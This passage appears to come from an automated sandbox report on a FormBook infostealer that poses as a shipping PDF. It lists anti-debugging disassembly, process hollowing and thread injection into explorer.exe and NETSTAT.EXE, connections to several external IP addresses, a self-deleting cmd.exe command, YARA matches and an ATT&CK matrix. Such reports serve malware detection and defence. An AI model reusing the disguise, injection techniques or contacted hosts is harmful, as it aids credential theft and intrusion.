    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA97ABE mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA29ABF mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA29ABF mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA29ABF mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9EBA80 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAA6A80 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAC4AE8 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA10AEB mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA10AEB mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA10AEB mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA03AF6 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA03AF6 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA03AF6 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA03AF6 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA03AF6 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA70AFF mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA70AFF mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA70AFF mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1DAC0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1DAC0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1DAC0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1DAC0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1DAC0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1DAC0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA00ACE mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA00ACE mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9EFAEC mov edi, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F0AED mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F0AED mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F0AED mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F9AE4 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1DA20 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1DA20 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1DA20 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1DA20 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1DA20 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1DA20 mov edx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA7DA31 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAADA30 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA2AA0E mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA2AA0E mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9E7A30 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9E7A30 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9E7A30 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F1A24 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F1A24 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EABBA66 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EABBA66 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EABBA66 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EABBA66 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9EFA44 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1EA40 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1EA40 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA7DA40 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA8AA40 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA8AA40 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA29A48 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA29A48 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA74A57 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA74A57 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAB8BBE mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAB8BBE mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAB8BBE mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAB8BBE mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA01B80 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA71B93 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA7DB90 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F3BA4 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F3BA4 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F3BA4 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F3BA4 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA21B9C mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA25BE0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA25BE0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA01BE7 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA01BE7 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAC4BE0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9EEBC0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1FBC0 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1FBC0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1FBC0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1FBC0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1FBC0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA2BBC0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA2BBC0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA2BBC0 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA2BBC0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA6FBC2 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA74BC0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA74BC0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA74BC0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA74BC0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9E7BF0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9E7BF0 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9E7BF0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9E7BF0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA18BD1 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA18BD1 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA96BDE mov ebx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA96BDE mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9ECB1E mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA2CB20 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA7CB20 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA7CB20 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA7CB20 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA7DB2A mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F8B10 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F8B10 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F8B10 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA31B0F mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA31B0F mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA00B10 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA00B10 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA00B10 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA00B10 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA7DB1B mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1EB1C mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAC4B67 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA24B79 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeProcess queried: DebugPort
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeProcess queried: DebugPort
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeProcess queried: DebugPort
    Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPort
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA32EB0 NtProtectVirtualMemory,LdrInitializeThunk,

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    System process connects to network (likely due to code injection or exploit)Show sources
    Source: C:\Windows\explorer.exeNetwork Connect: 154.94.229.8 80
    Source: C:\Windows\explorer.exeNetwork Connect: 107.178.157.225 80
    Source: C:\Windows\explorer.exeNetwork Connect: 3.64.163.50 80
    Source: C:\Windows\explorer.exeNetwork Connect: 35.198.112.85 80
    Source: C:\Windows\explorer.exeNetwork Connect: 70.40.220.123 80
    Source: C:\Windows\explorer.exeNetwork Connect: 183.181.99.12 80
    Source: C:\Windows\explorer.exeNetwork Connect: 184.168.98.97 80
    Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
    Source: C:\Windows\explorer.exeNetwork Connect: 64.190.62.111 80
    Sample uses process hollowing techniqueShow sources
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeSection unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 2A0000
    Maps a DLL or memory area into another processShow sources
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
    Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: read write
    Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
    Queues an APC in another process (thread injection)Show sources
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeThread APC queued: target process: C:\Windows\explorer.exe
    Modifies the context of a thread in another process (thread injection)Show sources
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeThread register set: target process: 4672
    Source: C:\Windows\SysWOW64\NETSTAT.EXEThread register set: target process: 4672
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeProcess created: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe"
    Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe"
    Source: explorer.exe, 00000007.00000000.22750707443.000000000D05E000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22980392582.000000000D05E000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22651288186.000000000D05E000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndKr|
    Source: explorer.exe, 00000007.00000000.22729255277.0000000001251000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.22633968917.0000000001251000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.22958895902.0000000001251000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.22678711865.0000000001251000.00000002.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26929829622.0000000004470000.00000002.00020000.sdmpBinary or memory string: Program Manager
    Source: explorer.exe, 00000007.00000000.22729255277.0000000001251000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.22683923873.0000000004790000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22633968917.0000000001251000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.22958895902.0000000001251000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.22678711865.0000000001251000.00000002.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26929829622.0000000004470000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
    Source: explorer.exe, 00000007.00000000.22729255277.0000000001251000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.22633968917.0000000001251000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.22958895902.0000000001251000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.22678711865.0000000001251000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.22727056323.0000000000B94000.00000004.00000020.sdmp, explorer.exe, 00000007.00000000.22956960258.0000000000B94000.00000004.00000020.sdmp, explorer.exe, 00000007.00000000.22632233648.0000000000B94000.00000004.00000020.sdmp, NETSTAT.EXE, 00000008.00000002.26929829622.0000000004470000.00000002.00020000.sdmpBinary or memory string: Progman
    Source: explorer.exe, 00000007.00000000.22729255277.0000000001251000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.22633968917.0000000001251000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.22958895902.0000000001251000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.22678711865.0000000001251000.00000002.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26929829622.0000000004470000.00000002.00020000.sdmpBinary or memory string: Progmanlock
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeQueries volume information: C:\ VolumeInformation

    Stealing of Sensitive Information:

    barindex
    Yara detected Generic DropperShow sources
    Source: Yara matchFile source: Process Memory Space: Arrival Notice, CIA Awb Inv Form.pdf.exe PID: 7132, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: NETSTAT.EXE PID: 5904, type: MEMORYSTR
    Yara detected FormBookShow sources
    Source: Yara matchFile source: 00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.26924489179.0000000002D00000.00000040.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.26924755438.0000000002D30000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000007.00000000.22745903057.000000000A598000.00000040.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000006.00000002.22815363833.00000000000A0000.00000040.00020000.sdmp, type: MEMORY

    Remote Access Functionality:

    barindex
    Yara detected FormBookShow sources
    Source: Yara matchFile source: 00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.26924489179.0000000002D00000.00000040.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.26924755438.0000000002D30000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000007.00000000.22745903057.000000000A598000.00000040.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000006.00000002.22815363833.00000000000A0000.00000040.00020000.sdmp, type: MEMORY

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsShared Modules1DLL Side-Loading1Process Injection512Masquerading1Credential API Hooking1Security Software Discovery321Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Rootkit1LSASS MemoryVirtualization/Sandbox Evasion22Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion22Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSSystem Network Configuration Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol114SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Network Connections Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information13Cached Domain CredentialsSystem Information Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDLL Side-Loading1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
